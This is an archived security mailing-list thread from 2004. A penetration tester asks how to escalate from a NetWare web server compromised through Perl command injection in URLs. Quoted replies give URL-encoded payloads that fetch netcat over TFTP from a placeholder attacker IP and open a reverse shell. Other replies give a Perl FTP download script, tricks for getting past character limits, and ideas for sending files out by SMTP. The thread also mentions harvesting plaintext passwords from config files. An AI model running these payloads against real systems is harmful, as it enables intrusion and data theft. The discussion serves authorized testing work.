Re: Escalating from Netware box

[Francois Labreque <flabreq () ca ibm com>]

"Dave Nuull" <gotodevnull () hotmail com> wrote on 2004-08-15 12:02:35:

> McKenna Henage or Beme Lee wrote:

> > I'm wrapping up a pen-test and I've gained access to a
> > NetWare-Enterprise-Web-Server/5.1 box through the ability to run Perl
> > commands using specially crafted URLs (e.g.,
> > "perl/-e%20system(%22dir%22);"). I wrote a program in Perl that crafts 
the
> > URLs to allow me to easily read any file on the server, write to any 
file,
> > or execute any command. However, without any Novell experience (I am a 
MS
> > and Linux guy), I am unable to escalate to the point of being able to
> > attack
> > other systems on the client's network.

> Aside question: If perl -e is a command line option, why does a simple 
'dir'
> not work?  Or a cmd%20/C%20dir?

Because "dir" does not work on a Novell server.  Nor does "CMD.EXE". 
Novell servers run their own OS.


> > Any suggestions for ways I can use this Netware box to further exploit
> > their
> > networks would be very much appreciated. In particular, I'm interested 
in
> > discovering what other devices are on their network (since I can only 
see
> > their Netware box from the Internet), performing port scans, 
vulnerability
> > scans, etc. I need to be nice to the server since it is in production, 
so
> > I'm trying not to experiment too much on their machine and risk 
bringing it
> > down (already crashed it once!).

> If you can execute on the remote server, and if there are any 'closed' 
ports
> (i.e not filtered) then have you tried to tftp up a nc.exe and shovel a
> shell back to your attack host?
> i.e.
> "perl/-e%20system(%22tftp%20-i%20Your_IP%20get%20nc.exe%22);"
> "perl/-e%20system(%22nc.exe%20-e%20cmd.exe%20Your_IP%20Your_Port%22);"

You would have to send an .NLM - The Novell executable format - Win32 or 
DOS .EXE formats do not run on Netware.


> If as you say below you cant find the tftp client, what about perl's FTP
> module:
> This one does not contain any " or ' chars so you could echo all the 
lines
> into
> a file on the remote server and run from the command line.

> use Net::FTP;
> $ftp=Net::FTP->new($ARGV[0]);
> $ftp->login($ARGV[1],$ARGV[2]);
> $ftp->binary();
> $ftp->get($ARGV[3]);
> $ftp->quit();

> > I've already done some research on Netware, including listening to 
RFP's
> > Black Hat talk on Netware, and reading the "Novell Hacking FAQ" 
available
> > on
> > the web. Unfortunately most resources I've found refer to Netware 2.x, 
3.x,
> > and 4.x. Here is what I've been able to gain so far, thanks to having
> > partial access to files on the system using directory traversal:

> If you have partial access to files (i.e at least read access), could 
you
> not tftp complete files back to your attack host?

There is usually no TFTP client on a Netware server.  He said he could 
read the files in a browser.


> This again assumes they have not
> configured restrictive outbound filtering on their firewall.  If you can
> find their internal mail server, you could craft some SMTP commands and
> mail them to yourself instead :-)

Assuming he can use the Perl command interface on the Netware server to 
connect to the SMTP server.


> > -Internal IP address
> > -IPX servers (running the command “display ipx servers”)
> > -See unencrypted passwords in /system/autoexec.ncf and /etc/netinfo.cfg
> > (and
> > to crack a password in /Novonyx/suitespot/admin-serv/config/ADMPW)
> > -Successfully ping out to a device on the Internet (unfortunately it
> > appears
> > to be continuous, because I wasn’t able to stop it)
> > -…and pretty much anything else that is in a file, or almost any 
command
> > I have run into some limits:
> >
> > -Any request I make (to read/write a file or execute a command) is 
limited
> > in character length, hampering my ability to execute an elaborate Perl
> > program on the box or even to read some files that are too far down the
> > directory tree

> If you have a command length limits, perhaps try to create a .bat file 
on
> the remote server using echo appends and splitting the command into 
smaller
> sections.
> "perl/-e%20system(%22echo%20cd%20some_path%20>>mycmd.bat%22);"
> "perl/-e%20system(%22echo%20run_command%20>>mycmd.bat%22);"
> "perl/-e%20system(%22mycmd.bat%22);"

.BAT files do not work on Netware servers.  He could create an .NCF which 
is basically the same thing as a .BAT but is limited to the commands that 
you can execute from the server prompt.


> > -Haven't found a way to send some characters such as " and ', even 
after
> > trying everything I could think of (encoding, double encoding, etc.). 
Wish
> > I
> > could do that because then I could essentially start writing a new Perl
> > script to their machine and overcome the character limitation just
> > mentioned, and potentially find a way to upload a Perl port scanner of 
some
> > sort.

> If you have perl interpreter access, you could use the pack/unpack 
functions
> to decode the " or ' chars into decimal/hex/octal and using one liners
> unpack the chars on the remote host. ref: ascii chart for char->hex 
values
> i.e.
> C:\>perl -e $a=pack(H6,222027);print$a;
> " '

> > -An inability to correctly view all files. Since I'm getting the files 
fed
> > back in a web browser, I can sometimes only see the first parts of a 
file
> > (up to 500K or so), and have trouble downloading binaries.
> >
> > -An inability to see the entire results of a command run on the system. 
I
> > can run a command, but then to see the results I have to open
> > /etc/console.log and read the last few lines (so I can't always see the
> > entire results, because it appears to be cut off in the log).

> Do command output redirections into your own log file not work on the
> server?

Exactly.  On a Netware server, if CONLOG.NLM is running ALL command output 
is duplicated in etc/console.log, if CONLOG.NLM is not running then the 
output will only appear on the server's physical console.  There is a way 
to change the size of /etc/console.log at the command line, so you could 
unload CONLOG and LOAD CONLOG with the proper parameter so that you get a 
couple of MBs of logs.


> > -I don’t even know how to download files to the Netware box. I have 
been
> > unable to determine if it has a HTTP or FTP client I can use to pull 
down a
> > trojan/backdoor program, netcat, or anything else.
> > -Some blockage at the firewall (?). For example, I tried loading the 
remote
> > console and then accessing it remotely, but it appears to be blocked at 
the
> > firewall since I can’t get in. If it were a Linux/Unix/Windows box then 
I’d
> > know how to download a SSH client and reverse-tunnel a connection out
> > through the firewall, but I’m clueless on Netware.
> >
> > Thanks in advance for any suggestions you can provide in the next 
couple
> > days.
> >
> > Beme Lee

[Hotmail spam snipped.]

___________________________________________________
François Labrèque, CCNP
Technical Leader, Network Support
IBM Global Services
Tel.:(514)-964-2150   Fax.:(514)-964-1708
flabreq () ca ibm com

In the future, performance will be measured by the size of your pipe!
       - Dogbert, on networking


------------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. All of our class sizes are
guaranteed to be 12 students or less to facilitate one-on-one interaction
with one of our expert instructors. Check out our Advanced Hacking course,
learn to write exploits and attack security infrastructure. Attend a course
taught by an expert instructor with years of in-the-field pen testing
experience in our state of the art hacking lab. Master the skills of an
Ethical Hacker to better assess the security of your organization.

http://www.securityfocus.com/sponsor/InfoSecInstitute_pen-test_040817
-------------------------------------------------------------------------------